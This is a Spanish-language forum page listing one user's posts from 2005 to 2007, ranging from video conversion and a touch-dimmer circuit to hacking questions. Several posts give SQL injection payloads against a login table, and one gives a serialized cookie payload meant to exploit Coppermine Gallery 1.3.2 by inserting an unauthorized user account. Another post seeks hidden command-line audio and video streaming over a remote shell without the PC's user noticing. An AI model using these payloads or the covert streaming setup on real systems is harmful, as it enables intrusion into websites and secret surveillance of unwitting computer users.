últimos mensajes de: jujaLVP

Mostrar Mensajes
Páginas: [1] 2

1	Media / Multimedia / De avi a mpeg2(problema con widescren)	en: 28 Abril 2007, 02:23 am
hola gente: Queria saber como tengo que convertir un video con aspecto widescreen avi a mpeg2 para que al verlo en un TV se vea todo el video y no una parte, cuando le doy zoom 1/2 se ve el video entero. Use MEncoder para convertir el avi. saludos

2	Informática / Electrónica / Voltaje de este proycto	en: 24 Enero 2007, 01:24 am
hola gente: Tngo intenciones de hacer un "dimmer al tacto" pero en el diagrama que encontre no dice el voltaje que necesita para funcionar y algunos componentes tienen 400v pero otros solo 25. Queria saber si alguien me pude decir a que voltaje opera el circuito, aca les dejo el link: http://apuntes.rincondelvago.com/circuito_dimmer-al-tacto.html saludos.

3	Media / Multimedia / Streaming de audio y video(oculto)	en: 27 Septiembre 2006, 04:11 am
hola gente Queria saber si alguien conoce algun soft para hacer streaming de audio y video pero que no muestre nada en pantalla, que sea por linea de comando. La idea es mediante una shell remota que tengo poder activar el streaming de audio y video sin que el usuario de la pc se entere. saludos

4	Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible	en: 26 Agosto 2006, 02:16 am
hola gente, tengo un problema: necesito si o si que el vncviewer se pueda conectar a localhost, porque estoy desarrollando una aplicacion que me permite conectarme a una pc detras de un router con NAT. Lo que yo intento hacer conectarme con el vncviewer a mi aplicacion (la que redirecciona el stream hasta la pc detras del router) y no a un vncserver directo pero cuando intento hacerlo el vncviewer me dice que no acepta conexiones locales. alguien sabe como cambiar esto? saludos

5	Seguridad Informática / Nivel Web / Re: SQL Injeccion- Pregunta	en: 28 Junio 2005, 03:37 am
leete esto: Tecnicas de SQL injection:Un repaso de Hernan Racciatti http://www.hernanracciatti.com.ar a mi me sirvio de mucho saludos

6	Seguridad Informática / Nivel Web / Re: SQL Injeccion- Pregunta	en: 28 Junio 2005, 01:44 am
veamos.. Citar ' UNION SELECT SUM(Store_ID) FROM Login-- me dio como resultado: Código: The sum or average aggregate operation cannot take a varchar data type as an argument. gracias a ese error te das cuenta que el campo "Store_ID" es de tipo "varchar" o sea cadena de caracteres mas comunmente llamada "string" y que aunque un string pueda contener numeros no se pueden utilizar en funciones como el "SUM" que admiten enteros como argumento. Citar El error que me da al tratar de agregar un usuario es : Código: Insert Error: Column name or number of supplied values does not match table definition. es probable que te de este error se deba a que no estas insertando valores en todos los campos que posee la tabla,pero no estoy muy seguro al respecto. Citar cuando puse '; insert into Login values (vcore, pass, 0xffff)-- (osea lo mismo pero sin comillas) dio como resultado: Código: The name 'vcore' is not permitted in this context. Only constants, expressions, or variables allowed here. Column names are not permitted. cuando pones algo sin comillas que no sean numeros,se interpreta como una variable o como el nombre de un campo, y como no se pueden poner nombres de campos dentro del "VALUES" del "INSERT" te tira este error. me quedo una duda, de el tercer campo de la tabla "Login" en el cual pusiste 0xffff, esta en el query original? si esta y no es de tipo varhcar te puede ser muy util... saludos.

7	Seguridad Informática / Nivel Web / Re: SQL Injeccion- Pregunta	en: 25 Junio 2005, 18:54 pm
hola! primero:en que campo haces la injecccion, Login.password¿? segundo:antes de hacer esto: Citar ' UNION SELECT MIN(Store_ID),1,1 FROM Login WHERE Store_ID > 'a'-- deberias saber los campos del query original, y aca Citar '; insert into Login values ('vcore', 'pass', 0xffff)-- creo que te da el error por las comillas,como hay varias quizas el motor de base de datos lo interpreta mal. saca los datos que te faltan y te dot una mano. saludos

8	Seguridad Informática / Nivel Web / Re: SQL injection complicada	en: 10 Junio 2005, 01:22 am
he notado que coppermine utiliza variables tipo "$CONFIG['TABLE_PICTURES']} "para referirse a las tabals en la base de datos, quizas mi codigo no tenga efecto porque yo estoy usando el nombre "default" de las tablas . alguien sabe como puedo obtener el nombre de la tabla sabiendo que no muestra eeror alguno para guiarme...?¿ saludos

Seguridad Informática / Nivel Web / Re: SQL injection complicada

en: 9 Junio 2005, 01:29 am

el query final quedaria asi:

Código:

SELECT filepath,filename  FROM {$CONFIG['TABLE_PICTURES']} WHERE approved = 'YES'AND pid IN (;INSERT INTO cpg132_users (user_regdate,user_active, user_actkey, user_name,user_password, user_email, user_location,user_interests, user_website, user_occupation)VALUES ('0000-00-00 00:00:00', '', '','nombreusuario', 'pass', 'email@dominio.com', '','', '', '' );#)

{$CONFIG['TABLE_PICTURES']}: es el nombre de la tabla pictures"

y aca esta la pantalla del error que me tira

saludos

10	Seguridad Informática / Nivel Web / SQL injection complicada	en: 8 Junio 2005, 02:13 am
hola gente: estoy intentando explotar una Vulnerabilidad de SQL injection en CPG 1.3.2 que es bastante dificil, ya que el codigo sql se coloca en una cookie codificada en base64 y dentro de una estrictura formada con la funcuion php "serialize" que sirve para guardar datos y sus tipos,Les muestro el codigo del Query: Citar if (count($FAVPICS)>0){ $favs = implode(",",$FAVPICS); $select_columns = 'filepath,filename'; $result = db_query("SELECT $select_columns FROM {$CONFIG['TABLE_PICTURES']} WHERE approved = 'YES'AND pid IN ($favs)"); $rowset = db_fetch_rowset($result); foreach ($rowset as $key => $row){ $filelist[] = $rowset[$key]['filepath'].$rowset[$key]['filename']; } $FAVPICS es un arreglo que contiene numeros de id de imagenes,y se extrae drectamente de las cookies sin chequeo alguno.osea que en $favs es donde estara nuestro codigo de injeccion. En los datos de la cookie coloque esto: a:1:{i:0;s:282:";INSERT INTO cpg132_users (user_regdate,user_active, user_actkey, user_name,user_password, user_email, user_location,user_interests, user_website, user_occupation)VALUES ('0000-00-00 00:00:00', '', '','nombreusuario', 'pass', 'email@dominio.com', '','', '', '' );#";} lo probe en mi servidor mysql y no me tira error alguno, funciona, pero cuando pongo esto en la cookie(codificado en base64) me dice la pagina que hay un error el procesar el query. laguna sugerencia¿? saludos

Páginas: [1] 2